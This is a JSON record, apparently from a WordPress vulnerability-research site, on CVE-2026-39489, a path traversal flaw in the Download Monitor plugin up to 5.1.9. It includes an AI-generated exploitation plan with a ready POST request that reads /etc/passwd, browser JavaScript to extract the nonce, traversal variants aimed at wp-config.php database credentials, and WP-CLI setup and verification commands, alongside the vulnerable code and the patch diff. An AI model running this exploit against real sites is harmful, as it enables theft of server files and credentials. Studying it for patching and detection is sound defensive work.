[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fc8F1BhyuX-1XBq4hRId64Aw0tdJtGzGsM5BBwDhfTlQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":38},"CVE-2026-39489","download-monitor-authenticated-author-arbitrary-file-download","Download Monitor \u003C= 5.1.9 - Authenticated (Author+) Arbitrary File Download","The Download Monitor plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 5.1.9. This makes it possible for authenticated attackers, with Author-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","download-monitor",null,"\u003C=5.1.9","5.1.10","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-04-20 00:00:00","2026-04-30 15:38:28",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fba111255-3b91-4ef6-8d57-10ff08363c48?source=api-prod",11,[22,23,24,25,26],"changelog.txt","download-monitor.php","readme.txt","src\u002FAdmin\u002FMediaInsert.php","vendor\u002Fcomposer\u002Finstalled.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-39489\n\n## 1. Vulnerability Summary\nThe **Download Monitor** plugin (up to 5.1.9) is vulnerable to **Path Traversal** and **Arbitrary File Download**. The vulnerability exists in the \"Quick-add\" download functionality within the Media Browser interface. Specifically, the plugin fails to properly validate the `download_url` parameter provided during the creation of a new download. This allows an authenticated user with sufficient privileges (Author and above, or any user with the `manage_downloads` capability) to create a download entry pointing to sensitive files on the server (e.g., `\u002Fetc\u002Fpasswd`, `wp-config.php`). Once created, the attacker can download these files through the plugin's frontend download mechanism.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fmedia-upload.php?tab=quick-add` (Action triggered by `media_upload_add_download` hook)\n- **HTTP Method:** `POST`\n- **Vulnerable Parameter:** `download_url`\n- **Authentication:** Author level or any user with `manage_downloads` capability.\n- **Preconditions:** The attacker must have access to the Media Browser's \"Insert Download\" interface.\n\n## 3. Code Flow\n1. **Entry Point:** The class `DLM_Admin_Media_Insert` (in `src\u002FAdmin\u002FMediaInsert.php`) registers the `media_upload_add_download` hook (line 34) which calls the `media_browser()` method.\n2. **Access Control:** The `media_browser()` method checks if the current user has the `manage_downloads` capability (line 99).\n3. **Form Processing:** If a `POST` request is sent with `download_url` and `download_title`, the method verifies the nonce `quick-add-nonce` (line 104).\n4. **Post Creation:**\n   - It creates a new `dlm_download` post (line 120).\n   - It creates a corresponding `dlm_download_version` post (line 139).\n5. **Path Resolution:** The plugin instantiates `DLM_File_Manager` and calls `$file_manager->get_secure_path( $url )` using the user-provided `$url` (line 152).\n6. **Persistence:** The resulting `$file_path` (which remains unvalidated for path traversal) is stored in the `_files` meta field of the `dlm_download_version` post (line 157).\n7. **Exploitation Sink:** When a user requests the download via `\u002F?download=[ID]`, the plugin retrieves the path from the `_files` meta and serves the file content without checking if the file resides within an allowed directory.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is required for the `quick-add` action. It is generated using `wp_create_nonce( 'quick-add' )` and embedded in the HTML of the Media Browser frame.\n\n1. **Navigate to the Media Browser:** Open the \"Insert Download\" frame.\n   - URL: `wp-admin\u002Fmedia-upload.php?type=add_download&tab=quick-add`\n2. **Extract Nonce:** Use the browser context to read the value of the hidden input field.\n   - **JavaScript:** `document.querySelector('input[name=\"quick-add-nonce\"]').value`\n   - **Tool:** `browser_eval(\"document.querySelector('input[name=\\\"quick-add-nonce\\\"]').value\")`\n\n## 5. Exploitation Strategy\n1. **Setup User:** Log in as a user with the `author` role. Ensure the role has `manage_downloads` (standard for Download Monitor configurations).\n2. **Get Nonce:** Navigate to the Media Upload page and extract the `quick-add` nonce.\n3. **Create Malicious Download:** Send a `POST` request to `wp-admin\u002Fmedia-upload.php?type=add_download&tab=quick-add` to create a download pointing to `\u002Fetc\u002Fpasswd`.\n4. **Identify Download ID:** Use the response or WP-CLI to find the ID of the newly created `dlm_download`.\n5. **Read File:** Navigate to the download URL on the frontend to retrieve the file content.\n\n### HTTP Request (Step 3):\n```http\nPOST \u002Fwp-admin\u002Fmedia-upload.php?type=add_download&tab=quick-add HTTP\u002F1.1\nHost: [TARGET_HOST]\nContent-Type: application\u002Fx-www-form-urlencoded\nCookie: [AUTH_COOKIES]\n\ndownload_url=\u002Fetc\u002Fpasswd&download_title=SystemData&download_version=1.0&quick-add-nonce=[EXTRACTED_NONCE]\n```\n\n## 6. Test Data Setup\n1. **Plugin:** Install and activate Download Monitor 5.1.9.\n2. **User:** \n   - `wp user create attacker attacker@example.com --role=author --user_pass=password`\n   - `wp cap add author manage_downloads` (To satisfy the `current_user_can('manage_downloads')` check in `src\u002FAdmin\u002FMediaInsert.php`).\n3. **Configuration:** No specific settings required, as the vulnerability is in the default \"Quick-add\" logic.\n\n## 7. Expected Results\n- The `POST` request should return a success message in the HTML: `\u003Cdiv class=\"updated\">\u003Cp>Download successfully created.\u003C\u002Fp>\u003C\u002Fdiv>`.\n- A new `dlm_download` post and `dlm_download_version` post will be visible in the database.\n- Requesting `\u002F?download=[ID]` will return the contents of the server's `\u002Fetc\u002Fpasswd` file.\n\n## 8. Verification Steps\n1. **Database Check:** Verify the file path is stored.\n   ```bash\n   # Find the ID of the latest version\n   VERSION_ID=$(wp post list --post_type=dlm_download_version --posts_per_page=1 --orderby=ID --order=DESC --field=ID)\n   # Check the meta value\n   wp post meta get $VERSION_ID _files\n   ```\n   *Result should be a JSON-encoded string containing `\"\u002Fetc\u002Fpasswd\"`.*\n2. **Download Check:** \n   - Locate the parent Download ID (`post_parent` of the version).\n   - Use the `http_request` tool to fetch `GET \u002F?download=[ID]`.\n   - Confirm the response contains `root:x:0:0:`.\n\n## 9. Alternative Approaches\n- **Path Variants:** If absolute paths are blocked, try relative traversal: `..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd`.\n- **Protocol Wrappers:** If the plugin validates paths but not schemes, try `file:\u002F\u002F\u002Fetc\u002Fpasswd`.\n- **WordPress Config:** Target `wp-config.php` (relative to the WordPress root) to extract database credentials: `download_url=..\u002Fwp-config.php`.\n- **REST API:** Check if the REST API version creation (`\u002Fwp-json\u002Fdownload-monitor\u002Fv1\u002Fdownloads`) is similarly unprotected, as hinted by the `DLM_File_Manager` usage.","The Download Monitor plugin for WordPress is vulnerable to Path Traversal in versions up to 5.1.9 via the 'Quick-add' download feature. This allows authenticated attackers with Author-level access or the 'manage_downloads' capability to create download records pointing to sensitive local files (like \u002Fetc\u002Fpasswd or wp-config.php) and subsequently download them via the plugin's frontend mechanism.","\u002F\u002F src\u002FAdmin\u002FMediaInsert.php:82\n\t\t\u002F\u002F phpcs:ignore\n\t\tif ( ! empty( $_POST['download_url'] ) && ! empty( $_POST['download_title'] ) && isset( $_POST['quick-add-nonce'] ) && wp_verify_nonce( $_POST['quick-add-nonce'], 'quick-add' ) ) {\n\n\t\t\t$url     = esc_url_raw( wp_unslash( $_POST['download_url'] ) );\n\t\t\t$title   = sanitize_text_field( wp_unslash( $_POST['download_title'] ) );\n\t\t\t$version = isset( $_POST['download_version'] ) ? sanitize_text_field( wp_unslash( $_POST['download_version'] ) ) : '';\n\n\t\t\ttry {\n        \u002F\u002F ...\n\t\t\t\t\t\u002F\u002F File Manager\n\t\t\t\t\t$file_manager = new DLM_File_Manager();\n\t\t\t\t\t\n\t\t\t\t\tlist( $file_path )  = $file_manager->get_secure_path( $url );\n\n\t\t\t\t\t\u002F\u002F Meta\n\t\t\t\t\tupdate_post_meta( $file_id, '_version', $version );\n\t\t\t\t\tupdate_post_meta( $file_id, '_filesize', $file_manager->get_file_size( $file_path ) );\n\t\t\t\t\tupdate_post_meta( $file_id, '_files', $file_manager->json_encode_files( array( $file_path ) ) );","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-monitor\u002F5.1.9\u002Fsrc\u002FAdmin\u002FMediaInsert.php\t2024-11-28 14:28:34.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-monitor\u002F5.1.10\u002Fsrc\u002FAdmin\u002FMediaInsert.php\t2026-03-05 07:46:28.000000000 +0000\n@@ -82,6 +82,10 @@\n \t\t\u002F\u002F phpcs:ignore\n \t\tif ( ! empty( $_POST['download_url'] ) && ! empty( $_POST['download_title'] ) && isset( $_POST['quick-add-nonce'] ) && wp_verify_nonce( $_POST['quick-add-nonce'], 'quick-add' ) ) {\n \n+\t\t\tif ( ! current_user_can( 'manage_downloads' ) ) {\n+\t\t\t\twp_die( esc_html__( 'You do not have sufficient permissions to perform this action.', 'download-monitor' ) );\n+\t\t\t}\n+\n \t\t\t$url     = esc_url_raw( wp_unslash( $_POST['download_url'] ) );\n \t\t\t$title   = sanitize_text_field( wp_unslash( $_POST['download_title'] ) );\n \t\t\t$version = isset( $_POST['download_version'] ) ? sanitize_text_field( wp_unslash( $_POST['download_version'] ) ) : '';","1. Authenticate as an Author or any user with the 'manage_downloads' capability.\n2. Access the Media Browser interface at 'wp-admin\u002Fmedia-upload.php?type=add_download&tab=quick-add' to retrieve a valid 'quick-add-nonce' from the hidden HTML input.\n3. Send a POST request to the same endpoint ('wp-admin\u002Fmedia-upload.php?type=add_download&tab=quick-add') with the 'download_url' parameter set to the target sensitive file path (e.g., '\u002Fetc\u002Fpasswd' or '..\u002Fwp-config.php').\n4. Observe the response to identify the ID of the newly created download (dlm_download post type).\n5. Visit the site frontend and request the download via the URL '\u002F?download=[ID]' to retrieve the contents of the sensitive file.","gemini-3-flash-preview","2026-05-04 19:57:31","2026-05-04 19:58:31",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","5.1.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-monitor\u002Ftags\u002F5.1.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-monitor.5.1.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-monitor\u002Ftags\u002F5.1.10","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-monitor.5.1.10.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-monitor\u002Ftags"]